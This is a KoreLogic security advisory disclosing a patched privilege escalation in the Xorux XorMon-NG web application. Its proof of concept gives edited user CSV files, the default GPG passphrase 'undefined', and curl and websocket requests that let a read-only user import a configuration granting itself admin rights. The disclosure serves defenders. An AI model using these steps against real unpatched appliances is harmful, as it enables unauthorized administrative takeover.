Xorux XorMon-NG Web Application Privilege Escalation to Administrator

Vulnerability Description

An API endpoint that should be limited to web application administrators is hidden from, but accessible by, lower-level read only web application users. The endpoint can be used to import the appliance configuration, allowing an attacker to control the configuration of the appliance, to include granting themselves administrative level permissions.

Technical Description

A read-only user can access a web application endpoint by which device imports can be uploaded. The device exports are in tar.gz.gpg format, and can be constructed to include arbitrary device configuration information of an attacker’s choosing. In the case of privilege escalation, an attacker can export the device configuration, modify the readonly account to have administrative privileges, and then re-import the configuration into the appliance. The GPG encryption uses a default of “undefined” for symmetric encryption and decryption. An authenticated, read-only attacker could leverage this vulnerability to obtain administrative level permissions within the web application.

Mitigation and Remediation Recommendation

Xorux released version 1.9.38, which includes a remediation for this vulnerability. See https://xormon.com/note190.php.

Credit

This vulnerability was discovered by Jim Becher of KoreLogic, Inc.

Proof of Concept

Use the steps documented in KL-001-2025-012, which allows for export the Xormon NG device configuration.

Edit the confporter/users_groups.csv file to include an additional line, indicating that the read only account be a member of the Admin group (typically/always group “1”). The user_id will depend on the user_id of the readonly account an attacker wants to use for privilege escalation. In the case of the research being performed, it was user_id “2”, so the modified users_groups.csv file is shown below:

    $ more users_groups.csv
    user_id;group_id
    1;1;
    2;1;
    3;1;

Additionally, a boolean value must be changed in the confporter/users.csv to indicate that the attacker’s account is no longer a read only account. The 8th field, identified as readonly should be changed from true to false, as shown below for the “jbecher” account.

    $ more users.csv
    user_id;username;email;password;active;locked;failed_login_attempts;readonly;ldap_id;timezone;created;updated;logged;configuration
    1;xormon;;$2b$10$GTliGfYOL7cUmvLpd6qTB.6x8UNTymyHrvLTncLoBmM/7Y5p4WsXi;true;false;0;false;;Etc/UTC;2025-06-09T20:27:52.040Z;2025-06-09T20:28:28.077Z;2025-06-09T20:28:28.051Z;{"showReleaseNotes":true,"searchHistoryLimit":40};
    3;adman;adman@adman.com;$2a$10$MvdgLQO60xPZyRIU/rXCeucdZsy4LMyGXCW36IIbrWTmBXNFb5urW;true;false;0;false;;UTC;2025-06-09T20:29:11.811Z;2025-06-09T20:29:11.811Z;;{"searchHistoryLimit":40};
    2;jbecher;jbecher@korelogic.com;$2a$10$gfngoltRPRvd0epLQ7YHVOrBDp1MuSvVlxMoOivIC1HwHsXRN1VVK;true;false;0;false;;UTC;2025-06-09T20:28:55.801Z;2025-06-09T20:29:31.962Z;2025-06-09T20:29:31.959Z;{"searchHistoryLimit":40};

The confporter/* files will need to be tar’d and gzip’d back up, and then gpg symmetrically encrypted with the passphrase of “undefined”. Once the GPG file is constructed, it can be imported by a readonly user as follows.

    $ curl -k -X POST -H "Cookie:
    connect.sid=s%3AWvQYNjQMd9mYNlUYkIcJOI9yVbkCQ4sN.n%2Bo%2FxPB7%2B1tnK9opKrPf8QHhN%2Feh%2BWVKJ5AwIK9tn%2Fo"
    https://172.31.255.208/api/confporter/v1/import -F
    file=@configuration-new3.tar.gz.gpg {"message":"File
    uploaded","status":200}[S]

An additional step of providing the GPG passphrase is performed as follows, from within Burp Repeater. Some fields have been snipped for brevity.

    GET /websocket/confimport?password=undefined HTTP/1.1
    Host: 172.31.255.208
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Origin: https://172.31.255.208
    Connection: keep-alive, Upgrade
    Cookie: connect.sid=s%3AWvQYNjQMd9mYNlUYkIcJOI9yVbkCQ4sN.n%2Bo%2FxPB7%2B1tnK9opKrPf8QHhN%2Feh%2BWVKJ5AwIK9tn%2Fo
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: websocket
    Sec-Fetch-Site: same-origin
    Pragma: no-cache
    Cache-Control: no-cache
    Upgrade: websocket

    HTTP/1.1 101 Switching Protocols
    Upgrade: websocket
    Connection: Upgrade

The readonly user can now establish a new session with the web application and will have administrative level permissions.

The contents of this advisory are copyright(c) 2025 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy